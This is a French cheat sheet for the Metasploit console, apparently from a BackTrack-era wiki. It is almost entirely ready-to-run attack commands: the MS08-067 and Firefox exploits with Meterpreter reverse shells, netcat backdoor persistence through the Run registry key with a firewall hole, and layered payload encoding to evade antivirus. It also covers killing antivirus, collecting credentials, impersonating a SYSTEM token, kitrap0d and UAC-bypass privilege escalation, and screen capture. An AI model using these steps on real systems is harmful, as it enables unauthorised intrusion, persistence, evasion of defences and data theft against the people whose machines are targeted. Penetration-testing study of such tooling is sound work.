Msfconsole
| Fiche express | |
|---|---|
| Domaine | Console principale du framework |
| Commande | msfconsole
|
| Contexte | Metasploit |
| Voir aussi | Msfcli · Meterpreter · Msfpayload |
La msfconsole est l'interface principale de Metasploit. Cette page regroupe l'essentiel des commandes et quelques scénarios pratiques.
Ressources
- http://www.offensive-security.com/metasploit-unleashed/Working_With_NeXpose
- https://community.rapid7.com/docs/DOC-1875
- http://wiki.deimos.fr/Metasploit_2.x
Plugin NeXpose — voir aussi Msfpayload et Postgres_metasploit pour connecter la console à PostgreSQL.
Démarrage
# mode graphique
msfgui
# mode console
msfconsole
Commandes de base
show exploits
show auxiliary
show [tab]
search dcom
search netapi
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.0.10
unset RHOST
setg RHOST 192.168.0.10
save
unsetg RHOST
set payload windows/adduser
exploit
back
exit
Arrière-plan et sessions :
background
sessions -l
sessions -i 1
Emplacement des payloads :
cd /opt/framework/msf3/modules/payloads/singles
cd /opt/framework/msf3/modules/payloads/stagers
cd /opt/framework/msf3/modules/payloads/stages
Scénario pratique (MS08-067)
msfconsole
search netapi
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.0.10
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.19
exploit
Puis utilisation de meterpreter.
Gestion des sessions et bureaux
- Session 0 : la console.
- Sessions 1, 2, 3… : les consoles distantes.
winsta0: la station interactive.
enumdesktops
getdesktop
setdesktop -h
migrate "PID svchost"
getdesktop
Plugins
Espia
Le plugin espia permet la capture d'écran, audio et vidéo (peu stable sous BackTrack pour l'audio et la webcam). Migrer d'abord sur WinSta0/Default :
migrate "PID explorer"
getuid
getdesktop
use espia
screengrab
Sniffers
use sniffer
sniffer_interfaces
sniffer_start 1
sniffer_stats 1
sniffer_dump 1 file.pcap
sniffer_stop 1
Les scripts du répertoire meterpreter sont utilisables via run :
cd /opt/framework/msf3/scripts/meterpreter
run [tab] [tab]
run checkvm
run credcollect
run enum_firefox
run get_application_list
run killav
run enum_logged_on_users -c
Incognito
use incognito
add_user toto password
add_localgroup_users mygroup toto
run getgui -e
Téléversement de netcat et persistance via le registre :
upload /dir/nc.exe c:\\windows\\system32
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc \
-d 'c:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
execute -f cmd -i
Configuration du pare-feu et connexion :
netsh firewall show opmode
netsh firewall add portopening TCP 455 "service Firewall" ENABLE ALL
netsh firewall show portopening
nc -v 192.168.0.10 445
Contournement d'antivirus
msfpayload windows/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4432 R | \
msfencode -e x86/shikata_ga_nai -t raw -c 10 | \
msfencode -e x86/call4_dword_xor -t raw -c 10 | \
msfencode -e x86/countdown -t exe > /root/extreme-notepad.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.10
set LPORT 4432
exploit
MITM et kitrap0d
run get_local_subnets
use incognito
list_tokens -g
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
run kitrap0d
Analyse de la victime
run get_env
run get_application_list
run scraper
run winenum -h
run prefetchtool
Exploitation Mozilla / Firefox
use exploit/windows/browser/mozilla_nstreerange
show options
set SRVHOST 192.168.0.10
set SRVPORT 4444
set URIPATH physics
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.10
exploit
Insérer ensuite le lien servi dans le navigateur cible.
XSSF
wget www.metasploit.com/redmine/attachments/596/XSSF.zip
msfconsole
db_connect root:toor@127.0.0.1:3306/msf3
load XSSF
xssf_active_victims
xssf_servers
use exploit/multi/browser/java_signed_applet
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.10
exploit
Divers
show exploits
use windows/smb/ms08_067_netapi
show payloads
use post/windows/escalate/bypassuac
Metasploit over Internet — ouvrir un port sur le routeur puis :
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.10 X > /root/home.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.10
exploit
Voir aussi
- Msfcli · Msfpayload · Msfencode
- Meterpreter · Incognito · NeXpose